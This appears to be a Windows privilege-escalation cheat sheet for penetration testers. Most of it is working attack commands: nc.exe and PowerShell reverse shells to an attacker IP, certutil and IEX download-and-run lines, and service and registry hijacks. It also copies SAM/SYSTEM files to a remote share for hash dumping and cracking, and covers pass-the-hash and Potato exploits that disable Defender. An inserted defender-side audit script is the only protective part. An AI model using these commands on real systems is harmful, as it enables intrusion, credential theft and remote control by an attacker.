Windows Privilege Escalation

This page provides a comprehensive guide for Windows privilege escalation and exploitation techniques, including practical commands, tools, and tips. Use these methods to enumerate, exploit, and escalate privileges on Windows systems during penetration testing.

Shell Handling Techniques

Reverse Shell

  • Basic reverse shell using nc.exe:
nc.exe 192.168.119.1 443 -e cmd.exe
  • From a network share:
\\192.168.119.1\a\bin\nc.exe 192.168.119.1 443 -e cmd.exe
  • PowerShell reverse shell:
powershell -NoP -NonI -W Hidden -Exec Bypass -Command $client = New-Object System.Net.Sockets.TCPClient("192.168.119.1",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
  • Shorter PowerShell variant:
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.119.1',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Basic System Enumeration

whoami
systeminfo

Or from a share:

\\192.168.119.1\a\bin\whoami.exe

Downloading Tools

certutil -URLcache -f http://192.168.119.1:8080/t/tool.exe tool.exe
powershell -c "Invoke-Webrequest -OutFile tool.exe -Uri http://192.168.119.1:8080/t/tool.exe"
powershell -c "IEX(New-Object Net.WebClient).downloadString('http://192.168.119.1:8080/t/tool.ps1')"
copy /B \\192.168.119.1\a\t\winPEASany.exe winPEASany.exe
copy /B \\192.168.119.1\a\bin\nc.exe nc.exe
copy /B \\192.168.119.1\a\bin\accesschk.exe accesschk.exe
copy /B \\192.168.119.1\a\bin\plink64.exe plink64.exe

Automated Enumeration Tools

winPEAS

copy /B \\192.168.119.1\a\t\winPEASany.exe winPEASany.exe
./winPEASany.exe

Seatbelt

SharpUp

PowerUp

Powerless.bat

accesschk.exe

Service Exploitation

Service Enumeration & Manipulation

sc.exe qc <name>                          # Query service config
sc.exe query <name>                       # Query service status
sc.exe config <name> <option>= <value>    # Change config (note the space after '=')
net start <name>                          # Start service
net stop <name>                           # Stop service
winPEASany.exe quiet servicesinfo         # Automated service checks

Insecure Service Properties

accesschk.exe /accepteula -ucqv <name>
# Look for SERVICE_CHANGE_CONFIG, SERVICE_START, SERVICE_STOP
sc qc <name>
# Look for SERVICE_START_NAME : LOCALSYSTEM
sc config <name> binpath= "C:\rs.exe"
net stop <name>
net start <name>

Unquoted Service Paths

accesschk.exe /accepteula -uwdq "C:\Program Files\Some Folder\Service.exe"
# Look for RW BUILTIN\USERS
copy rs.exe "C:\Program Files\Some.exe"
net stop <name>
net start <name>

Weak Registry Permissions

get-acl HKLM:\System\CurrentControlSet\services\<name> | Format-List
accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\services\<name>
accesschk.exe /accepteula -ucqv <name>
# Look for SERVICE_CHANGE_CONFIG, SERVICE_START, SERVICE_STOP
reg query HKLM\System\CurrentControlSet\services\<name>
reg add HKLM\SYSTEM\CurrentControlSet\services\<name> /v ImagePath /t REG_EXPAND_SZ /d C:\path\new\binary /f
net stop <name>
net start <name>

Insecure Service Executables

accesschk.exe /accepteula -quvw <path>
# Look for RW EVERYONE
accesschk.exe /accepteula -uvqc <path>
copy <path> c:\Temp
copy /Y rs.exe <path>
net stop <name>
net start <name>
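The service checks from the sections above (unquoted paths with spaces, service executables writable by low-privileged users, and writable service registry keys whose ImagePath can be repointed) collapsed into one defender-side audit script; this is an added example, not code from the original cheat sheet. It assumes an elevated PowerShell session on the host under review and that the principal list in $lowPriv is adjusted to your environment; permissions on the service object itself (SERVICE_CHANGE_CONFIG, as shown by accesschk above) are not covered because Get-Acl does not expose service ACLs.

```powershell
# Added audit script (not from the original cheat sheet). Assumes an elevated
# PowerShell session on the host being reviewed; $lowPriv is an assumption and
# may need widening for your environment.

# Principals whose Allow-write ACE on a service binary or key is a finding.
$lowPriv = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users',
             'NT AUTHORITY\INTERACTIVE')
# Rights that let a user replace the binary or repoint ImagePath.
$fileWrite = [int][System.Security.AccessControl.FileSystemRights]'Write, Delete, ChangePermissions, TakeOwnership'
$regWrite  = [int][System.Security.AccessControl.RegistryRights]'SetValue, CreateSubKey, ChangePermissions, TakeOwnership'

function Get-ServiceExe([string]$PathName) {
    # Quoted path: take what is inside the quotes; otherwise the text up to the first .exe.
    if ($PathName -match '^\s*"([^"]+)"') { return $Matches[1] }
    if ($PathName -match '^(.*?\.exe)') { return $Matches[1] }
    return ($PathName -split '\s')[0]
}

function Test-UnquotedPath([string]$PathName) {
    # The exploitable form from the section above: unquoted AND a space before the .exe name.
    if ($PathName -match '^\s*"') { return $false }
    return (($PathName -split '\.exe')[0] -match '\s')
}

function Test-LowPrivWrite($Acl, [string]$RightsProperty, [int]$WriteMask) {
    # True if any Allow ACE for a low-privileged principal carries a write-type right.
    # (Unmapped GENERIC_* bits are not translated here; Get-Acl normally maps them.)
    foreach ($ace in $Acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($lowPriv -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.$RightsProperty -band $WriteMask) -ne 0) { return $true }
    }
    return $false
}

function Get-ServiceFindings {
    foreach ($svc in Get-CimInstance Win32_Service) {
        $exe = [Environment]::ExpandEnvironmentVariables((Get-ServiceExe $svc.PathName))
        if (Test-UnquotedPath $svc.PathName) {
            [pscustomobject]@{ Service = $svc.Name; RunsAs = $svc.StartName; Issue = 'Unquoted path with spaces'; Detail = $svc.PathName }
        }
        if ($exe -and (Test-Path -LiteralPath $exe) -and (Test-LowPrivWrite (Get-Acl -LiteralPath $exe -ErrorAction SilentlyContinue) 'FileSystemRights' $fileWrite)) {
            [pscustomobject]@{ Service = $svc.Name; RunsAs = $svc.StartName; Issue = 'Executable writable by low-priv users'; Detail = $exe }
        }
        $key = "HKLM:\SYSTEM\CurrentControlSet\Services\$($svc.Name)"
        if ((Test-Path -LiteralPath $key) -and (Test-LowPrivWrite (Get-Acl -LiteralPath $key -ErrorAction SilentlyContinue) 'RegistryRights' $regWrite)) {
            [pscustomobject]@{ Service = $svc.Name; RunsAs = $svc.StartName; Issue = 'Registry key writable (ImagePath can be repointed)'; Detail = $key }
        }
    }
}

Get-ServiceFindings | Sort-Object Issue, Service | Format-Table -AutoSize -Wrap
```

Findings with RunsAs of LocalSystem are the ones that match the SERVICE_START_NAME : LOCALSYSTEM condition the sections above look for, so triage those first.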

DLL Hijacking

Password & Credential Attacks

winPEASany.exe quiet fileinfo userinfo

Password Leak in Registry

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

Winexe (Remote Command Execution)

winexe -U 'admin%adminpassword' //10.10.10.10 cmd.exe
winexe -U 'admin%adminpassword' --system //10.10.10.10 cmd.exe

Saved Credentials

winPEASany.exe quiet cmd windowscreds
cmdkey /list
runas /savecred /user:admin rs.exe

Config Files

winPEASany.exe quiet cmd searchfast fileinfo
dir /s *pass* == *.config
findstr /si password *.xml *.ini *.txt

SAM (Security Account Manager) Backup Files

copy C:\Windows\Repair\SAM \\192.168.119.160\a\
copy C:\Windows\Repair\SYSTEM \\192.168.119.160\a\
cd creddump7
python2 pwdump.py SYSTEM SAM
# admin:1004:aad3b4...:<hash>:::
hashcat -m 1000 --force <hash> /usr/share/wordlists/rockyou.txt

Passing Password Hash

pth-winexe -U 'admin:1004:aad3b4...:<hash>' //10.10.10.10 cmd.exe
pth-winexe --system -U 'admin:1004:aad3b4...:<hash>' //10.10.10.10 cmd.exe

Potato Exploits

Hot Potato

Potato.exe -ip 192.168.119.160 -cmd "rs.exe" -disable_exhaust true -disable_defender true -enable_httpserver true -enable_spoof true

Kernel Exploits

systeminfo > \\192.168.119.160\a\systeminfo.txt
python wes.py systeminfo.txt -i 'Elevation of Privilege' --exploits-only | less

Active Directory (AD) Attacks

Further Reading & References